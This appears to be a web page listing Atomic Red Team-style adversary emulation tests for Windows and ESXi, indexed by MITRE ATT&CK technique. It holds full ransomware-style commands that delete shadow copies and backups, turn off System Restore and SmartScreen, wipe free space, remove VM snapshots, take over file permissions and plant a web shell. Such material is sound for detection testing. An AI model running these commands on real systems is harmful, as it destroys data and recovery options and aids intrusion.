Use reg.exe to enable both ‘remote to local’ and ‘remote to remote’ symbolic links. This allows access to files from local shortcuts with local or remote paths. [reference](https://symantec-enterprise-blogs.security.com/threat-intelligence/noberus-blackcat-alphv-rust-ransomware/)
reg add "HKLM\SYSTEM\CurrentControlSet\Control\FileSystem" /v SymlinkRemoteToLocalEvaluation /t REG_DWORD /d "1" /f
reg add "HKLM\SYSTEM\CurrentControlSet\Control\FileSystem" /v SymlinkRemoteToRemoteEvaluation /t REG_DWORD /d "1" /f
T1222.001 command_prompt windows Take ownership using takeown utility
Windows Permissions
Modifies the filesystem permissions of the specified file or folder to take ownership of the object. Upon execution, "SUCCESS" will be displayed for the folder and each file inside of it.
takeown.exe /f #{file_folder_to_own} /r
T1222.001 command_prompt windows cacls - Grant permission to specified user or group recursively
Windows Permissions
Modifies the filesystem permissions of the specified folder and contents to allow the specified user or group Full Control. If "Access is denied" is displayed, it may be because the file or folder doesn't exist. Run the prereq command to create it. Upon successful execution, "Successfully processed 3 files" will be displayed.
icacls.exe #{file_or_folder} /grant #{user_or_group}:F
T1222.001 command_prompt windows attrib - Remove read-only attribute
Windows Permissions
Removes the read-only attribute from a file or folder using the attrib.exe command. Upon execution, no output will be displayed. Open the file in File Explorer, right-click, select Properties and observe that the Read-only checkbox is empty.
attrib.exe -r #{file_or_folder}\*.* /s
T1222.001 command_prompt windows attrib - hide file
Windows Permissions
Attackers leverage an existing Windows binary, attrib.exe, to mark specific files or folders as hidden by using specific flags so that the victim does not see the file.
mkdir #{file_or_folder} >nul 2>&1
echo T1222.001_attrib1 >> #{file_or_folder}\T1222.001_attrib1.txt
echo T1222.001_attrib2 >> #{file_or_folder}\T1222.001_attrib2.txt
attrib.exe +h #{file_or_folder}\T1222.001_attrib1.txt
attrib.exe +h #{file_or_folder}\T1222.001_attrib2.txt
T1222.001 command_prompt elevated windows Grant Full Access to folder for Everyone - Ryuk Ransomware Style
Windows Permissions
Invokes the command line similar to that used by Ryuk Ransomware to grant full access to the entire C:\ drive for Everyone. *icacls "C:\" /grant Everyone:F /T /C /Q* However, for this atomic we set the permission on C:\Users\Public so it completes faster and doesn't irreversibly affect the host. You can set your own path variable to "C:\" if you prefer.
icacls "#{path}" /grant Everyone:F /T /C /Q
T1222.001 command_prompt elevated windows SubInAcl Execution
Windows Permissions
This test simulates an adversary executing the Windows Resource kit utility SubInAcl. This utility was abused by adversaries in the past in order to modify access permissions. Upon execution, a process creation log should be generated indicating successful execution.
"C:\Program Files (x86)\Windows Resource Kits\Tools\subinacl.exe"
T1482 command_prompt windows Windows - Discover domain trusts with dsquery
Domain Trust Discovery
Uses the dsquery command to discover domain trusts. Requires the installation of dsquery via Windows RSAT or the Windows Server AD DS role.
dsquery * -filter "(objectClass=trustedDomain)" -attr *
T1482 command_prompt windows Windows - Discover domain trusts with nltest
Domain Trust Discovery
Uses the nltest command to discover domain trusts. Requires the installation of nltest via Windows RSAT or the Windows Server AD DS role. This technique has been used by the Trickbot malware family.
nltest /domain_trusts
nltest /trusted_domains
T1482 command_prompt windows Adfind - Enumerate Active Directory OUs
Domain Trust Discovery
The AdFind tool can be used for reconnaissance in an Active Directory environment. This example has been documented by ransomware actors enumerating Active Directory OUs. Reference: http://www.joeware.net/freetools/tools/adfind/, https://www.fireeye.com/blog/threat-research/2019/04/pick-six-intercepting-a-fin6-intrusion.html
"PathToAtomicsFolder\..\ExternalPayloads\AdFind.exe" -f (objectcategory=organizationalUnit) #{optional_args}
T1482 command_prompt windows Adfind - Enumerate Active Directory Trusts
Domain Trust Discovery
The AdFind tool can be used for reconnaissance in an Active Directory environment. This example has been documented by ransomware actors enumerating Active Directory trusts. Reference: http://www.joeware.net/freetools/tools/adfind/, https://www.fireeye.com/blog/threat-research/2019/04/pick-six-intercepting-a-fin6-intrusion.html
"PathToAtomicsFolder\..\ExternalPayloads\AdFind.exe" #{optional_args} -gcb -sc trustdmp
T1482 command_prompt windows TruffleSnout - Listing AD Infrastructure
Domain Trust Discovery
Iterative AD discovery toolkit for offensive operators, intended for situational awareness and targeted low-noise enumeration with a preference for OpSec. Reference: https://github.com/dsnezhkov/TruffleSnout
"#{trufflesnout_path}" forest -n #{domain}
"#{trufflesnout_path}" domain -n #{domain}
T1484.001 command_prompt elevated windows LockBit Black - Modify Group policy settings -cmd
Group Policy Modification
An adversary can modify the group policy settings.
reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows\System" /v GroupPolicyRefreshTimeDC /t REG_DWORD /d 0 /f
reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows\System" /v GroupPolicyRefreshTimeOffsetDC /t REG_DWORD /d 0 /f
reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows\System" /v GroupPolicyRefreshTime /t REG_DWORD /d 0 /f
reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows\System" /v GroupPolicyRefreshTimeOffset /t REG_DWORD /d 0 /f
reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows\System" /v EnableSmartScreen /t REG_DWORD /d 0 /f
reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows\System" /v ShellSmartScreenLevel /t REG_SZ /d Block /f
T1485 command_prompt windows Overwrite deleted data on C drive
Data Destruction
RansomEXX malware overwrites all deleted files using the Windows built-in cipher.exe to prevent forensic recovery. This process is very slow and test execution may time out. https://www.cybereason.com/blog/cybereason-vs.-ransomexx-ransomware https://support.microsoft.com/en-us/topic/cipher-exe-security-tool-for-the-encrypting-file-system-56c85edd-85cf-ac07-f2f7-ca2d35dab7e4
cipher.exe /w:C:
T1485 command_prompt windows ESXi - Delete VM Snapshots
Data Destruction
Deletes all snapshots for all Virtual Machines on an ESXi Host [Reference](https://lolesxi-project.github.io/LOLESXi/lolesxi/Binaries/vim-cmd/#inhibit%20recovery)
echo "" | "#{plink_file}" -batch "#{vm_host}" -ssh -l #{vm_user} -pw "#{vm_pass}" "for i in `vim-cmd vmsvc/getallvms | awk 'NR>1 {print $1}'`; do vim-cmd vmsvc/snapshot.removeall $i & done"
T1486 command_prompt elevated windows PureLocker Ransom Note
Data Encrypted for Impact
Builds the IOC (YOUR_FILES.txt) for the PureLocker ransomware. https://www.bleepingcomputer.com/news/security/purelocker-ransomware-can-lock-files-on-windows-linux-and-macos/
echo T1486 - Purelocker Ransom Note > %USERPROFILE%\Desktop\YOUR_FILES.txt
T1486 command_prompt elevated windows Data Encrypt Using DiskCryptor
Data Encrypted for Impact
DiskCryptor, an open source encryption utility, can be exploited by adversaries for encrypting all disk partitions, including system partitions. This tool was identified in a ransomware campaign, as reported on https://thedfirreport.com/2021/11/15/exchange-exploit-leads-to-domain-wide-ransomware/. The documentation for DiskCryptor can be found at https://github.com/DavidXanatos/DiskCryptor. During the installation process, running dcrypt.exe starts the encryption console. It's important to note that a system reboot is necessary as part of the installation.
""%PROGRAMFILES%\dcrypt"\#{dcrypt_exe}"
T1489 command_prompt elevated windows Windows - Stop service using Service Controller
Service Stop
Stops a specified service using the sc.exe command. Upon execution, if the spooler service was running, information will be displayed saying it has changed to a state of STOP_PENDING. If the spooler service was not running, "The service has not been started." will be displayed and it can be started by running the cleanup command.
sc.exe stop #{service_name}
T1489 command_prompt elevated windows Windows - Stop service using net.exe
Service Stop
Stops a specified service using the net.exe command. Upon execution, if the service was running "The Print Spooler service was stopped successfully." will be displayed. If the service was not running, "The Print Spooler service is not started." will be displayed and it can be started by running the cleanup command.
net.exe stop #{service_name}
T1489 command_prompt windows Windows - Stop service by killing process
Service Stop
Stops a specified service by killing the service's process. This technique was used by WannaCry. Upon execution, if the spoolsv service was running, "SUCCESS: The process "spoolsv.exe" with PID 2316 has been terminated." will be displayed. If the service was not running, "ERROR: The process "spoolsv.exe" not found." will be displayed and it can be started by running the cleanup command.
taskkill.exe /f /im #{process_name}
T1490 command_prompt elevated windows Windows - Delete Volume Shadow Copies
Inhibit System Recovery
Deletes Windows Volume Shadow Copies. This technique is used by numerous ransomware families and APT malware such as Olympic Destroyer. Upon execution, if no shadow volumes exist, the message "No items found that satisfy the query." will be displayed. If shadow volumes are present, it will delete them without printing output to the screen, because the /quiet parameter was passed, which also suppresses the y/n confirmation prompt. Shadow copies can only be created on Windows Server or Windows 8. https://docs.microsoft.com/en-us/previous-versions/windows/it-pro/windows-server-2012-R2-and-2012/cc788055(v=ws.11)
vssadmin.exe delete shadows /all /quiet
T1490 command_prompt elevated windows Windows - Delete Volume Shadow Copies via WMI
Inhibit System Recovery
Deletes Windows Volume Shadow Copies via WMI. This technique is used by numerous ransomware families and APT malware such as Olympic Destroyer.
wmic.exe shadowcopy delete
T1490 command_prompt elevated windows Windows - wbadmin Delete Windows Backup Catalog
Inhibit System Recovery
Deletes Windows Backup Catalog. This technique is used by numerous ransomware families and APT malware such as Olympic Destroyer. Upon execution, "The backup catalog has been successfully deleted." will be displayed in the PowerShell session.
wbadmin delete catalog -quiet
T1490 command_prompt elevated windows Windows - Disable Windows Recovery Console Repair
Inhibit System Recovery
Disables repair by the Windows Recovery Console on boot. This technique is used by numerous ransomware families and APT malware such as Olympic Destroyer. Upon execution, "The operation completed successfully." will be displayed in the PowerShell session.
bcdedit.exe /set {default} bootstatuspolicy ignoreallfailures
bcdedit.exe /set {default} recoveryenabled no
T1490 command_prompt elevated windows Windows - Delete Backup Files
Inhibit System Recovery
Deletes backup files in a manner similar to Ryuk ransomware. Upon execution, many "access is denied" messages will appear as the commands try to delete files from around the system.
del /s /f /q c:\*.VHD c:\*.bac c:\*.bak c:\*.wbcat c:\*.bkf c:\Backup*.* c:\backup*.* c:\*.set c:\*.win c:\*.dsk
T1490 command_prompt elevated windows Windows - wbadmin Delete systemstatebackup
Inhibit System Recovery
Deletes the Windows systemstatebackup using wbadmin.exe. This technique is used by numerous ransomware families. This may only be successful on server platforms that have Windows Backup enabled.
wbadmin delete systemstatebackup -keepVersions:0
T1490 command_prompt elevated windows Windows - Disable the SR scheduled task
Inhibit System Recovery
Use schtasks.exe to disable the System Restore (SR) scheduled task.
schtasks.exe /Change /TN "\Microsoft\Windows\SystemRestore\SR" /disable
T1490 command_prompt elevated windows Disable System Restore Through Registry
Inhibit System Recovery
Modify the registry using reg.exe via the cmd console to disable System Restore on the computer. See how the Remcos RAT abuses this technique: https://www.virustotal.com/gui/file/2d7855bf6470aa323edf2949b54ce2a04d9e38770f1322c3d0420c2303178d91/details
reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows NT\SystemRestore" /v "DisableConfig" /t "REG_DWORD" /d "1" /f
reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows NT\SystemRestore" /v "DisableSR" /t "REG_DWORD" /d "1" /f
reg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\SystemRestore" /v "DisableConfig" /t "REG_DWORD" /d "1" /f
reg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\SystemRestore" /v "DisableSR" /t "REG_DWORD" /d "1" /f
T1490 command_prompt elevated windows Modify VSS Service Permissions
Inhibit System Recovery
This atomic test alters the security settings of the Volume Shadow Copy Service (VSS) by modifying its permissions, potentially impacting system recovery operations. The specific permissions set by the command are as follows:
- Deny Generic All (GA) permissions to Network Users (NU)
- Deny GA permissions to Everyone (WD)
- Deny GA permissions to Anonymous (AN)
- Allow Full Access (FA) and Generic All (GA) permissions to Everyone (WD) in the System ACL (SACL)
- Allow Object Inherit and Inherit Only (OIIO) Full Access (FA) and GA permissions to Everyone (WD) in the SACL
These permissions can significantly restrict VSS functionality, including backup and restore operations. As such, it is essential to run this test only in a controlled environment with administrative privileges. A cleanup command is provided to reset VSS permissions to a common default configuration, which should be verified against your specific system's configuration. It's crucial to use this cleanup command after testing to ensure the system's backup and recovery capabilities remain functional. Running this test on a production system or critical environment is not recommended without proper precautions and a robust recovery plan.
sc sdset VSS D:(D;;GA;;;NU)(D;;GA;;;WD)(D;;GA;;;AN)S:(AU;FA;GA;;;WD)(AU;OIIOFA;GA;;;WD)
T1491.001 command_prompt windows ESXi - Change Welcome Message on Direct Console User Interface (DCUI)
Internal Defacement
Changes the ESXi welcome message to potentially display ransom information. [Reference](https://lolesxi-project.github.io/LOLESXi/lolesxi/Binaries/esxcli/#change%20display%20information)
echo "" | "#{plink_file}" -batch "#{vm_host}" -ssh -l #{vm_user} -pw "#{vm_pass}" "esxcli system welcomemsg set -m 'RANSOMWARE-NOTIFICATION'"
T1505.003 command_prompt windows Web Shell Written to Disk
Web Shell
This test simulates an adversary leveraging Web Shells by simulating the file modification to disk. Idea from APTSimulator. cmd.aspx source - https://github.com/tennc/webshell/blob/master/fuzzdb-webshell/asp/cmd.aspx
xcopy /I /Y "#{web_shells}" #{web_shell_path}
T1505.004 command_prompt windows Install IIS Module using AppCmd.exe
IIS Components
The following Atomic will utilize AppCmd.exe to install a new IIS Module. IIS must be installed. This atomic utilizes a DLL on disk, but to test further suspiciousness, compile and load [IIS-Raid](https://www.mdsec.co.uk/2020/02/iis-raid-backdooring-iis-using-native-modules/). A successful execution will install a module into IIS using AppCmd.exe. [Managing and installing Modules Reference](https://learn.microsoft.com/en-us/iis/get-started/introduction-to-iis/iis-modules-overview#to-install-a-module-using-appcmdexe) [IIS Modules](https://www.microsoft.com/en-us/security/blog/2022/12/12/iis-modules-the-evolution-of-web-shells-and-how-to-detect-them/)
%windir%\system32\inetsrv\appcmd.exe install module /name:#{module_name} /image:#{dll_path}
T1518 command_prompt windows Find and Display Internet Explorer Browser Version
Software Discovery
Query the registry to determine the version of Internet Explorer installed on the system. Upon execution, version information about Internet Explorer will be displayed.
reg query "HKEY_LOCAL_MACHINE\Software\Microsoft\Internet Explorer" /v svcVersion
T1518.001 command_prompt windows Security Software Discovery
Security Software Discovery
Methods to identify security software on an endpoint. When successfully executed, the test displays running processes, firewall configuration for the network profiles, and specific security software.
netsh.exe advfirewall show allprofiles
netsh.exe advfirewall firewall dump
netsh.exe advfirewall show currentprofile
netsh.exe advfirewall firewall show rule name=all
netsh.exe firewall show state
netsh.exe firewall show config
sc query windefend
powershell.exe /c "Get-Process | Where-Object { $_.ProcessName -eq 'Sysmon' }"
powershell.exe /c "Get-Service | where-object {$_.DisplayName -like '*sysm*'}"
powershell.exe /c "Get-CimInstance Win32_Service -Filter 'Description = ''System Monitor service'''"
tasklist.exe
tasklist.exe | findstr /i virus
tasklist.exe | findstr /i cb
tasklist.exe | findstr /i defender
tasklist.exe | findstr /i cylance
tasklist.exe | findstr /i mc
tasklist.exe | findstr /i "virus cb defender cylance mc"
T1518.001 command_prompt elevated windows Security Software Discovery - Sysmon Service
Security Software Discovery
Discovery of an installed Sysinternals Sysmon service using its driver altitude (even if the name is changed). When successfully executed, the test displays the Sysmon driver instance if it is installed.
fltmc.exe | findstr.exe 385201
T1518.001 command_prompt elevated windows Security Software Discovery - AV Discovery via WMI
Security Software Discovery
Discovery of installed antivirus products via a WMI query. When successfully executed, the test displays the installed AV software.
wmic.exe /Namespace:\\root\SecurityCenter2 Path AntiVirusProduct Get displayName /Format:List
threatengine.sh  ·  Open-source threat intelligence platform  ·  100+ authoritative sources  ·  Every fact traces to its origin